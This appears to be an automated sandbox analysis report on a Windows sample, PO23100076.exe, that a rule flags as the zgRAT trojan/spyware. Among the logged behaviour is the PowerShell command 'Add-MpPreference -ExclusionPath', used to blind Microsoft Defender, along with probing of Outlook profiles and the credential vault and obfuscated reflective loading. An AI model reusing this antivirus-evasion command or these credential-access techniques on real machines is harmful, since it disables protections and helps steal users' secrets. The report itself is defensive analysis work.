                      Source: PO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                      System Summary

                      barindex
                      Source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: PO23100076.exe, Program.csLarge array initialization: : array initializer size 584046
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE44F10_2_04AE44F1
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE397C0_2_04AE397C
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE04140_2_04AE0414
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE45100_2_04AE4510
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE25480_2_04AE2548
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_04AE25580_2_04AE2558
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068287400_2_06828740
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068203B80_2_068203B8
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_0682B8280_2_0682B828
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068287300_2_06828730
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068284490_2_06828449
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068284580_2_06828458
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_068203B50_2_068203B5
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_0682AC780_2_0682AC78
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06821A3A0_2_06821A3A
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_0682B8180_2_0682B818
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F000400_2_06F00040
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F057380_2_06F05738
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F02CFD0_2_06F02CFD
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F02D180_2_06F02D18
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F053000_2_06F05300
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F000280_2_06F00028
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F049500_2_06F04950
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F031500_2_06F03150
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F031480_2_06F03148
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_04EA41408_2_04EA4140
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_04EA4D588_2_04EA4D58
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_04EA44888_2_04EA4488
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_062C1CB08_2_062C1CB0
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_062C3D088_2_062C3D08
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_0647CA388_2_0647CA38
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_06476B588_2_06476B58
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_064700408_2_06470040
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_06479CC08_2_06479CC0
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_064742108_2_06474210
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 8_2_0647A4438_2_0647A443
                      Source: PO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1277345753.000000000698F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1277551118.0000000006C20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1270177045.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO23100076.exe
                      Source: PO23100076.exe, 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO23100076.exe
                      Source: PO23100076.exe, 00000008.00000002.2487417203.0000000000AF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO23100076.exe
                      Source: PO23100076.exe, 00000008.00000002.2487084327.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
                      Source: PO23100076.exeBinary or memory string: OriginalFilenamejcwP.exe@ vs PO23100076.exe
                      Source: PO23100076.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: PO23100076.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, nteQjLvwvZrNfpr2GT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, nteQjLvwvZrNfpr2GT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/6@3/1
                      Source: C:\Users\user\Desktop\PO23100076.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100076.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqwcyacm.xrf.ps1Jump to behavior
                      Source: PO23100076.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO23100076.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO23100076.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PO23100076.exeReversingLabs: Detection: 44%
                      Source: PO23100076.exeVirustotal: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: PO23100076.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO23100076.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs.Net Code: MhbL3HrjYh5e9bS83ig System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs.Net Code: MhbL3HrjYh5e9bS83ig System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\PO23100076.exeCode function: 0_2_06F0970D push FFFFFF8Bh; iretd 0_2_06F0970F
                      Source: PO23100076.exeStatic PE information: section name: .text entropy: 7.913866005602331
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, noPojjR9Pn5xTJrT9R.csHigh entropy of concatenated method names: 'JLWWudGB1e', 'sTeWdncUnC', 'WxQWRgxTq9', 'Cf6WO9NhvJ', 'dPpW0nS4Dk', 'M5ZWldUVNO', 'V1DWpG9bAF', 'sYhW1mBRem', 'zU4W6w5S1F', 'EooWPmSjSl'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, kV0lI2rrtIrCxmKWuK.csHigh entropy of concatenated method names: 'HJryAVM8Nv', 's6DycCk2Jl', 'UByyvp6TDq', 'DefyrDl00H', 'WKJyWXRsdf', 'CREyanhe3p', 't0xyMGhHTD', 'IRIy9F6mfS', 'VwByVFn30E', 'Y1WyKchxqA'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.csHigh entropy of concatenated method names: 'CtfogPOuIl', 'Kgbo2hVwmc', 'ppNoFZATM3', 'gEnoyqwEHj', 'rdhoB30ZJv', 'xmUoYYkdrb', 'MZwotLZWZT', 'GJro586mRi', 'xKDoZ1mhXJ', 'GjEoiFSyCP'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, qfXQtGmpukQKEpK3iy.csHigh entropy of concatenated method names: 'ToString', 'QEsaeniyil', 'Hqma0Y9Oo2', 'qLsaldZAON', 'qUdapcIAih', 'ADfa17pFFv', 'svea6dPGID', 'HGKaPeeL4Z', 'u2nakjbrLJ', 'rf2aTifW6a'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, fTiLHoCEAqncxaWftsR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'enFKeG5OAY', 'kKaKdFJWGB', 'a7jKbkX3qj', 'GW5KR0CnC1', 'tRUKOfpRjy', 'fnSKmSr0hU', 'V65Khr4yE7'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, zWtfYdXOcyqZfalbPR.csHigh entropy of concatenated method names: 'IGNjPLyC4', 'v3dACNbf5', 'IojcAeTeQ', 'UZsnKZ5In', 'pg1rp37OA', 'Qfaqo13qC', 'p1vdLrKiO9xD1yZreq', 'sBShIOC23VmvWpuD5K', 'Rn09lPxHU', 'cQCKvAsqJ'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, yXVWjkwhVF0XdpnNcy.csHigh entropy of concatenated method names: 'rbuVWs0MPQ', 'nU2VM00faf', 'FVUVVcjtdB', 'IchVDF4JJy', 'pJ3VNRsG7l', 'ym7VSpXf7R', 'Dispose', 'BfQ929angQ', 'WJp9FTt8LM', 'war9y8qrUQ'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, L3XNgB8WxtdAWbUg1Q.csHigh entropy of concatenated method names: 'UufKylBB76', 'F31KB7UEEb', 'i7iKYpA7A5', 'ubOKtBOEqF', 'gWJKVdp4aW', 'em2K5mp7mU', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, KK7U2Q4QKPNYjJF1QR.csHigh entropy of concatenated method names: 'CtrVG7ffEH', 'S5RV0UQrWU', 'r0OVlsTjVf', 'JwHVpW6DoP', 'AWhV1GaSfF', 'aV4V6PMvTU', 'vjuVP3JNLW', 'wMFVkWdYAy', 'p8BVT69x04', 'baNVuMNM5y'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, QD4VtECoFGKpc26yn8V.csHigh entropy of concatenated method names: 'OPND8ADHGo', 'nMpDzhnwGk', 'J6mIEHYbyW', 'LsFrJ1Nn1UdvpfdQSw7', 'ClK9SNNzaCpfy8pDEJ1', 'x9aLnvXkq3SB2bMcsdE', 'ODACQYXrpa56V2Cqlsf'
